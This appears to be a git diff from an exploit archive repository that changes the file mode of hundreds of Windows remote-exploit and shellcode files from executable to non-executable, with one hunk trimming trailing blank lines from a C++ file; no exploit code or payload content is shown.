b/platforms/windows/remote/5395.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5397.txt b/platforms/windows/remote/5397.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5398.html b/platforms/windows/remote/5398.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/54.c b/platforms/windows/remote/54.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5416.html b/platforms/windows/remote/5416.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5445.cpp b/platforms/windows/remote/5445.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5489.html b/platforms/windows/remote/5489.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5496.html b/platforms/windows/remote/5496.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5511.html b/platforms/windows/remote/5511.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5519.c b/platforms/windows/remote/5519.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5530.html b/platforms/windows/remote/5530.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5536.php b/platforms/windows/remote/5536.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/556.c b/platforms/windows/remote/556.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/56.c b/platforms/windows/remote/56.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5612.html b/platforms/windows/remote/5612.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5619.html b/platforms/windows/remote/5619.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/568.c b/platforms/windows/remote/568.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5681.html b/platforms/windows/remote/5681.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5694.cpp b/platforms/windows/remote/5694.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5695.cpp b/platforms/windows/remote/5695.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/573.c b/platforms/windows/remote/573.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5732.html b/platforms/windows/remote/5732.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5741.html b/platforms/windows/remote/5741.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5746.html b/platforms/windows/remote/5746.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5747.html b/platforms/windows/remote/5747.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5750.html b/platforms/windows/remote/5750.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/577.c b/platforms/windows/remote/577.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5777.html b/platforms/windows/remote/5777.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5778.html b/platforms/windows/remote/5778.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5793.html b/platforms/windows/remote/5793.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5795.html b/platforms/windows/remote/5795.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/582.c b/platforms/windows/remote/582.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/5827.cpp b/platforms/windows/remote/5827.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/589.html b/platforms/windows/remote/589.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/590.c b/platforms/windows/remote/590.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6004.txt b/platforms/windows/remote/6004.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6012.php b/platforms/windows/remote/6012.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/612.html b/platforms/windows/remote/612.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6121.c b/platforms/windows/remote/6121.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6124.c b/platforms/windows/remote/6124.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6151.txt b/platforms/windows/remote/6151.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6152.html b/platforms/windows/remote/6152.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/616.c b/platforms/windows/remote/616.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6175.html b/platforms/windows/remote/6175.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/618.c b/platforms/windows/remote/618.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/619.c b/platforms/windows/remote/619.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6195.c b/platforms/windows/remote/6195.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/621.c b/platforms/windows/remote/621.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6220.html b/platforms/windows/remote/6220.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6227.c b/platforms/windows/remote/6227.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/623.c b/platforms/windows/remote/623.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6238.c b/platforms/windows/remote/6238.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6278.txt b/platforms/windows/remote/6278.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6317.html b/platforms/windows/remote/6317.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6318.html b/platforms/windows/remote/6318.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6323.html b/platforms/windows/remote/6323.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6324.html b/platforms/windows/remote/6324.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6334.html b/platforms/windows/remote/6334.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6355.txt b/platforms/windows/remote/6355.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/636.c b/platforms/windows/remote/636.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6367.txt b/platforms/windows/remote/6367.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/637.c b/platforms/windows/remote/637.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/64.c b/platforms/windows/remote/64.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/640.c b/platforms/windows/remote/640.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6407.c b/platforms/windows/remote/6407.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/641.txt b/platforms/windows/remote/641.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6414.html b/platforms/windows/remote/6414.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/643.c b/platforms/windows/remote/643.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6454.html b/platforms/windows/remote/6454.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/646.c b/platforms/windows/remote/646.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6491.html b/platforms/windows/remote/6491.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/650.c b/platforms/windows/remote/650.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6506.txt b/platforms/windows/remote/6506.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6537.html b/platforms/windows/remote/6537.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/654.c b/platforms/windows/remote/654.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6548.html b/platforms/windows/remote/6548.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/658.c b/platforms/windows/remote/658.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/66.c b/platforms/windows/remote/66.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6600.html b/platforms/windows/remote/6600.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6630.html b/platforms/windows/remote/6630.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6638.html b/platforms/windows/remote/6638.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6656.txt b/platforms/windows/remote/6656.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6661.txt b/platforms/windows/remote/6661.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/668.c b/platforms/windows/remote/668.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6686.txt b/platforms/windows/remote/6686.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6690.html b/platforms/windows/remote/6690.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6699.html b/platforms/windows/remote/6699.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/670.c b/platforms/windows/remote/670.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/675.txt b/platforms/windows/remote/675.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6773.html b/platforms/windows/remote/6773.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6774.html b/platforms/windows/remote/6774.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6776.html b/platforms/windows/remote/6776.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6793.html b/platforms/windows/remote/6793.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6801.txt b/platforms/windows/remote/6801.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6813.html b/platforms/windows/remote/6813.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6828.html b/platforms/windows/remote/6828.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6840.html b/platforms/windows/remote/6840.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6841.txt b/platforms/windows/remote/6841.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6870.html b/platforms/windows/remote/6870.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6871.html b/platforms/windows/remote/6871.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6872.html b/platforms/windows/remote/6872.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6873.html b/platforms/windows/remote/6873.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6875.html b/platforms/windows/remote/6875.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6878.html b/platforms/windows/remote/6878.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6880.html b/platforms/windows/remote/6880.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/69.c b/platforms/windows/remote/69.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/693.c b/platforms/windows/remote/693.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/6963.html b/platforms/windows/remote/6963.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/70.c b/platforms/windows/remote/70.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7104.c b/platforms/windows/remote/7104.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/711.c b/platforms/windows/remote/711.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7125.txt b/platforms/windows/remote/7125.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7142.html b/platforms/windows/remote/7142.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7145.txt b/platforms/windows/remote/7145.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7167.html b/platforms/windows/remote/7167.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7181.html b/platforms/windows/remote/7181.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/719.txt b/platforms/windows/remote/719.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7196.html b/platforms/windows/remote/7196.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/726.c b/platforms/windows/remote/726.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/729.txt b/platforms/windows/remote/729.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/730.html b/platforms/windows/remote/730.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/733.c b/platforms/windows/remote/733.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/734.c b/platforms/windows/remote/734.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7355.txt b/platforms/windows/remote/7355.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7384.txt b/platforms/windows/remote/7384.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7402.html b/platforms/windows/remote/7402.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7403.txt b/platforms/windows/remote/7403.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7410.htm b/platforms/windows/remote/7410.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7442.txt b/platforms/windows/remote/7442.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7477.html b/platforms/windows/remote/7477.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/750.c b/platforms/windows/remote/750.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7505.html b/platforms/windows/remote/7505.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7521.txt b/platforms/windows/remote/7521.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/753.html b/platforms/windows/remote/753.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7566.html b/platforms/windows/remote/7566.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/759.cpp b/platforms/windows/remote/759.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7594.html b/platforms/windows/remote/7594.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/76.c b/platforms/windows/remote/76.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/761.cpp b/platforms/windows/remote/761.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7617.html b/platforms/windows/remote/7617.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7623.html b/platforms/windows/remote/7623.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7630.html b/platforms/windows/remote/7630.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/765.c b/platforms/windows/remote/765.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7706.mrc b/platforms/windows/remote/7706.mrc old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/771.cpp b/platforms/windows/remote/771.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7739.html b/platforms/windows/remote/7739.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7747.html b/platforms/windows/remote/7747.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7748.html b/platforms/windows/remote/7748.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7749.html b/platforms/windows/remote/7749.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7755.html b/platforms/windows/remote/7755.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7757.html b/platforms/windows/remote/7757.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7762.html b/platforms/windows/remote/7762.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7763.html b/platforms/windows/remote/7763.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7779.html b/platforms/windows/remote/7779.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7794.html b/platforms/windows/remote/7794.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7804.html b/platforms/windows/remote/7804.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7826.html b/platforms/windows/remote/7826.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7827.html b/platforms/windows/remote/7827.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7842.html b/platforms/windows/remote/7842.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7868.html b/platforms/windows/remote/7868.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7871.html b/platforms/windows/remote/7871.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7903.html b/platforms/windows/remote/7903.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7910.html b/platforms/windows/remote/7910.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7912.txt b/platforms/windows/remote/7912.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7918.txt b/platforms/windows/remote/7918.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7919.txt b/platforms/windows/remote/7919.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7928.txt b/platforms/windows/remote/7928.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7935.html b/platforms/windows/remote/7935.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/794.c b/platforms/windows/remote/794.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/7966.txt b/platforms/windows/remote/7966.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/80.c b/platforms/windows/remote/80.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/802.cpp b/platforms/windows/remote/802.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/804.c b/platforms/windows/remote/804.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8041.txt b/platforms/windows/remote/8041.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8059.html b/platforms/windows/remote/8059.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8079.html b/platforms/windows/remote/8079.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8082.html b/platforms/windows/remote/8082.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/81.c b/platforms/windows/remote/81.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8118.html b/platforms/windows/remote/8118.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8143.html b/platforms/windows/remote/8143.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8144.txt b/platforms/windows/remote/8144.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8149.txt b/platforms/windows/remote/8149.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8155.txt b/platforms/windows/remote/8155.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8160.html b/platforms/windows/remote/8160.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8173.txt b/platforms/windows/remote/8173.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8206.html b/platforms/windows/remote/8206.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8208.html b/platforms/windows/remote/8208.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8215.txt b/platforms/windows/remote/8215.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/822.c b/platforms/windows/remote/822.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/823.c b/platforms/windows/remote/823.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/825.c b/platforms/windows/remote/825.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8253.c b/platforms/windows/remote/8253.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8256.c b/platforms/windows/remote/8256.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8257.txt b/platforms/windows/remote/8257.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/827.c b/platforms/windows/remote/827.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8273.c b/platforms/windows/remote/8273.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8283.c b/platforms/windows/remote/8283.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/83.html b/platforms/windows/remote/83.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/830.c b/platforms/windows/remote/830.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8332.txt b/platforms/windows/remote/8332.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8368.txt b/platforms/windows/remote/8368.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8392.txt b/platforms/windows/remote/8392.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8398.php b/platforms/windows/remote/8398.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8428.txt b/platforms/windows/remote/8428.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/845.c b/platforms/windows/remote/845.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8463.txt b/platforms/windows/remote/8463.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/847.cpp b/platforms/windows/remote/847.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8537.txt b/platforms/windows/remote/8537.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/854.cpp b/platforms/windows/remote/854.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8560.html b/platforms/windows/remote/8560.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8562.html b/platforms/windows/remote/8562.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8579.html b/platforms/windows/remote/8579.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/859.c b/platforms/windows/remote/859.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8666.txt b/platforms/windows/remote/8666.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/868.cpp b/platforms/windows/remote/868.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8704.txt b/platforms/windows/remote/8704.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8733.html b/platforms/windows/remote/8733.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8742.txt b/platforms/windows/remote/8742.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/875.c b/platforms/windows/remote/875.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8754.patch b/platforms/windows/remote/8754.patch old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8757.html b/platforms/windows/remote/8757.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8758.html b/platforms/windows/remote/8758.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8765.php b/platforms/windows/remote/8765.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8824.html b/platforms/windows/remote/8824.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/883.c b/platforms/windows/remote/883.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8835.html b/platforms/windows/remote/8835.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8897.c b/platforms/windows/remote/8897.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8922.txt b/platforms/windows/remote/8922.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8930.txt b/platforms/windows/remote/8930.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8938.txt b/platforms/windows/remote/8938.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8970.txt b/platforms/windows/remote/8970.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/8986.txt b/platforms/windows/remote/8986.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/90.c b/platforms/windows/remote/90.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9002.c b/platforms/windows/remote/9002.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/906.c b/platforms/windows/remote/906.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9065.c b/platforms/windows/remote/9065.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/909.cpp b/platforms/windows/remote/909.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9093.txt b/platforms/windows/remote/9093.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9096.txt b/platforms/windows/remote/9096.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9106.txt b/platforms/windows/remote/9106.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9137.html b/platforms/windows/remote/9137.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/92.c b/platforms/windows/remote/92.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/930.html b/platforms/windows/remote/930.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9303.c b/platforms/windows/remote/9303.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/943.html b/platforms/windows/remote/943.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/944.c b/platforms/windows/remote/944.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9443.txt b/platforms/windows/remote/9443.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/945.c b/platforms/windows/remote/945.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/949.c b/platforms/windows/remote/949.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9500.cpp b/platforms/windows/remote/9500.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/953.c b/platforms/windows/remote/953.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/960.c b/platforms/windows/remote/960.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9615.jar b/platforms/windows/remote/9615.jar old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9638.txt b/platforms/windows/remote/9638.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9643.txt b/platforms/windows/remote/9643.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9649.txt b/platforms/windows/remote/9649.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9650.txt b/platforms/windows/remote/9650.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9662.c b/platforms/windows/remote/9662.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/967.cpp b/platforms/windows/remote/967.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9676.txt b/platforms/windows/remote/9676.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/968.c b/platforms/windows/remote/968.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/969.c b/platforms/windows/remote/969.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9694.txt b/platforms/windows/remote/9694.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/97.c b/platforms/windows/remote/97.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9704.html b/platforms/windows/remote/9704.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9705.html b/platforms/windows/remote/9705.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/976.cpp b/platforms/windows/remote/976.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/979.txt b/platforms/windows/remote/979.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9800.cpp b/platforms/windows/remote/9800.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9802.html b/platforms/windows/remote/9802.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9803.html b/platforms/windows/remote/9803.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9805.html b/platforms/windows/remote/9805.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9810.txt b/platforms/windows/remote/9810.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9813.txt b/platforms/windows/remote/9813.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/986.html b/platforms/windows/remote/986.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/987.c b/platforms/windows/remote/987.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9886.txt b/platforms/windows/remote/9886.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9893.txt b/platforms/windows/remote/9893.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9896.txt b/platforms/windows/remote/9896.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/990.c b/platforms/windows/remote/990.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9900.txt b/platforms/windows/remote/9900.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9902.txt b/platforms/windows/remote/9902.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9905.cpp b/platforms/windows/remote/9905.cpp old mode 100755 new mode 100644 index e2ba1a594..c211e7b10 --- a/platforms/windows/remote/9905.cpp +++ b/platforms/windows/remote/9905.cpp @@ -383,6 +383,4 @@ void main(int argc, char * argv[]) }; try_host (argv[1]); -}; - - \ No newline at end of file +}; \ No newline at end of file diff --git a/platforms/windows/remote/9957.txt b/platforms/windows/remote/9957.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9966.txt b/platforms/windows/remote/9966.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9992.txt b/platforms/windows/remote/9992.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/9998.c b/platforms/windows/remote/9998.c old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/13560.txt b/platforms/windows/shellcode/13560.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/13581.txt b/platforms/windows/shellcode/13581.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/13582.txt b/platforms/windows/shellcode/13582.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/13645.c b/platforms/windows/shellcode/13645.c old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/13649.txt b/platforms/windows/shellcode/13649.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/13828.c b/platforms/windows/shellcode/13828.c old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/14052.c b/platforms/windows/shellcode/14052.c old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/14221.html b/platforms/windows/shellcode/14221.html old mode 100755 new mode 100644 diff --git a/platforms/windows/shellcode/14697.c b/platforms/windows/shellcode/14697.c old mode 100755 new mode 100644 